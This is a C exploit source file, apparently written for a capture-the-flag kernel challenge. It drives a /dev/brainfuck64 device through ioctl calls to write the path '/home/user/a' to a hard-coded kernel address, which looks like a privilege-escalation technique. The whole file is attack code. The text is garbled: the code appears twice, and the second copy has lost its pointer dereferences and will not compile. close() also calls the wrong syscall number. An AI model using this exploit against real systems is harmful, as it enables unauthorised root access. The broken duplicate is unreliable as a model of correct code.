hama7230/exp.c

## exp.c
#define O_RDONLY 0
#define O_RDWR 00000002


int read(int fd, char* buf, int len) {
    __asm__("mov rax, 0");
    __asm__("syscall");
}

int write(int fd, char* buf, int len) {
    __asm__("mov rax, 1");
    __asm__("syscall");
}

int open(char* filename, int flags) {
    __asm__("mov rax, 2");
    __asm__("syscall");
}

int close(int fd) {
    __asm__("mov rax, 2");
    __asm__("syscall");
}

void exit(int status) {
    __asm__("mov rax, 60");
    __asm__("syscall");

}

int ioctl(unsigned int fd, unsigned int cmd, unsigned long* arg) {
    __asm__("mov rax, 16");
    __asm__("syscall");
}

void memset(char* a, char b, int len) {
        int i;
            for (i=0; i<len; i++) {
                        a[i] = b;
                            }
}

int fd;
int dev_read(unsigned long *buf) {
    return ioctl(fd, 0xD00DC0D3, buf);
}
int dev_write(unsigned long size) {
    unsigned long buf[2];
    buf[0] = 0x34364642;
    buf[1] = size;
    return ioctl(fd, 0xAC1DC0D3 , buf);
}

int exec_bf(unsigned long *buf) {
    return ioctl(fd, 0xBAADC0D3, buf);
}
void _start(void){
    fd = open("/dev/brainfuck64", O_RDWR);
    if (fd < 0) {exit(1);}
    dev_write(0x20);

    char insts[500];
    memset(insts, 0, 500);
    memset(insts, '+', 7);
    memset(insts+7, '<', 8);
    memset(insts+0xf, '^', 1);
    *(unsigned long*)&insts[0x10] = 0xffffffff81a3f7a0;
    exec_bf(insts);

    memset(insts, 0, 500);
    memset(insts, '+', 7);
    memset(insts+7, '^', 1);
    *(unsigned long*)&insts[0x8] = 0x73752f656d6f682f;
    memset(insts+0x10, '^', 1);
    *(unsigned long*)&insts[0x11] = 0x612f7265;
    exec_bf(insts);
    exit(0);
}
	#define O_RDONLY 0
	#define O_RDWR 00000002


	int read(int fd, char* buf, int len) {
	__asm__("mov rax, 0");
	__asm__("syscall");
	}

	int write(int fd, char* buf, int len) {
	__asm__("mov rax, 1");
	__asm__("syscall");
	}

	int open(char* filename, int flags) {
	__asm__("mov rax, 2");
	__asm__("syscall");
	}

	int close(int fd) {
	__asm__("mov rax, 2");
	__asm__("syscall");
	}

	void exit(int status) {
	__asm__("mov rax, 60");
	__asm__("syscall");

	}

	int ioctl(unsigned int fd, unsigned int cmd, unsigned long* arg) {
	__asm__("mov rax, 16");
	__asm__("syscall");
	}

	void memset(char* a, char b, int len) {
	int i;
	for (i=0; i<len; i++) {
	a[i] = b;
	}
	}

	int fd;
	int dev_read(unsigned long *buf) {
	return ioctl(fd, 0xD00DC0D3, buf);
	}
	int dev_write(unsigned long size) {
	unsigned long buf[2];
	buf[0] = 0x34364642;
	buf[1] = size;
	return ioctl(fd, 0xAC1DC0D3 , buf);
	}

	int exec_bf(unsigned long *buf) {
	return ioctl(fd, 0xBAADC0D3, buf);
	}
	void _start(void){
	fd = open("/dev/brainfuck64", O_RDWR);
	if (fd < 0) {exit(1);}
	dev_write(0x20);

	char insts[500];
	memset(insts, 0, 500);
	memset(insts, '+', 7);
	memset(insts+7, '<', 8);
	memset(insts+0xf, '^', 1);
	(unsigned long)&insts[0x10] = 0xffffffff81a3f7a0;
	exec_bf(insts);

	memset(insts, 0, 500);
	memset(insts, '+', 7);
	memset(insts+7, '^', 1);
	(unsigned long)&insts[0x8] = 0x73752f656d6f682f;
	memset(insts+0x10, '^', 1);
	(unsigned long)&insts[0x11] = 0x612f7265;
	exec_bf(insts);
	exit(0);
	}